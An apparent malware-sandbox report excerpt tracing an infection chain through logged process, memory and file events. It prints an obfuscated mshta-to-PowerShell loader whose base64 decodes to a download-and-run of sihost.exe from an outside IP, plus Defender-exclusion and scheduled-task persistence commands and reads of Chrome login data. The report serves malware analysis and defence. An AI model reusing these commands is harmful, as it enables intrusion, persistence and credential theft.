                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory written: C:\Users\user\AppData\Roaming\sihost.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory written: C:\Users\user\AppData\Roaming\bKVNuVuE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sihost.exe "C:\Users\user\AppData\Roaming\sihost.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D56.tmp" "c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Users\user\AppData\Roaming\sihost.exe "C:\Users\user\AppData\Roaming\sihost.exe"Jump to behavior
                        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmpA3FD.tmp"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfqynwd0zm90rxvticagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtvflwzsagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlrmlosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagc0nsdujftw8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagq0lvlhvpbnqgicagicagicagicagicagicagicagicagicagicagignuleludfb0ciagicagicagicagicagicagicagicagicagicagicagsudqrck7jyagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicjzvnzgvnlsde4iicagicagicagicagicagicagicagicagicagicagicatbmftzvnwqunficagicagicagicagicagicagicagicagicagicagicbsa3lrv0rlegggicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrumjvndgzvdev1uzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje3ni4xmzgvndavc2lob3n0lmv4zsisiirfbly6qvbqrefuqvxzawhvc3quzxhliiwwldapo1n0yvjulvnmzuvwkdmpo1n0yvj0icagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxhnpag9zdc5legui'+[char]34+'))')))"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfqynwd0zm90rxvticagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtvflwzsagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlrmlosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagc0nsdujftw8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagq0lvlhvpbnqgicagicagicagicagicagicagicagicagicagicagignuleludfb0ciagicagicagicagicagicagicagicagicagicagicagsudqrck7jyagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicjzvnzgvnlsde4iicagicagicagicagicagicagicagicagicagicagicatbmftzvnwqunficagicagicagicagicagicagicagicagicagicagicbsa3lrv0rlegggicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrumjvndgzvdev1uzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje3ni4xmzgvndavc2lob3n0lmv4zsisiirfbly6qvbqrefuqvxzawhvc3quzxhliiwwldapo1n0yvjulvnmzuvwkdmpo1n0yvj0icagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxhnpag9zdc5legui'+[char]34+'))')))"
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfqynwd0zm90rxvticagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtvflwzsagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlrmlosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagc0nsdujftw8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagq0lvlhvpbnqgicagicagicagicagicagicagicagicagicagicagignuleludfb0ciagicagicagicagicagicagicagicagicagicagicagsudqrck7jyagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicjzvnzgvnlsde4iicagicagicagicagicagicagicagicagicagicagicatbmftzvnwqunficagicagicagicagicagicagicagicagicagicagicbsa3lrv0rlegggicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrumjvndgzvdev1uzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje3ni4xmzgvndavc2lob3n0lmv4zsisiirfbly6qvbqrefuqvxzawhvc3quzxhliiwwldapo1n0yvjulvnmzuvwkdmpo1n0yvj0icagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxhnpag9zdc5legui'+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfqynwd0zm90rxvticagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtvflwzsagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlrmlosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagc0nsdujftw8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagq0lvlhvpbnqgicagicagicagicagicagicagicagicagicagicagignuleludfb0ciagicagicagicagicagicagicagicagicagicagicagsudqrck7jyagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicjzvnzgvnlsde4iicagicagicagicagicagicagicagicagicagicagicatbmftzvnwqunficagicagicagicagicagicagicagicagicagicagicbsa3lrv0rlegggicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrumjvndgzvdev1uzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje3ni4xmzgvndavc2lob3n0lmv4zsisiirfbly6qvbqrefuqvxzawhvc3quzxhliiwwldapo1n0yvjulvnmzuvwkdmpo1n0yvj0icagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxhnpag9zdc5legui'+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeQueries volume information: C:\Users\user\AppData\Roaming\sihost.exe VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeQueries volume information: C:\Users\user\AppData\Roaming\sihost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeQueries volume information: C:\Users\user\AppData\Roaming\bKVNuVuE.exe VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeQueries volume information: C:\Users\user\AppData\Roaming\bKVNuVuE.exe VolumeInformation
                        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 12.2.sihost.exe.3699550.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.3699550.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.460456249.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.455899860.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3620, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bKVNuVuE.exe PID: 3560, type: MEMORYSTR
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3620, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3620, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bKVNuVuE.exe PID: 3560, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 12.2.sihost.exe.3699550.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.3699550.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.460456249.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.455899860.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
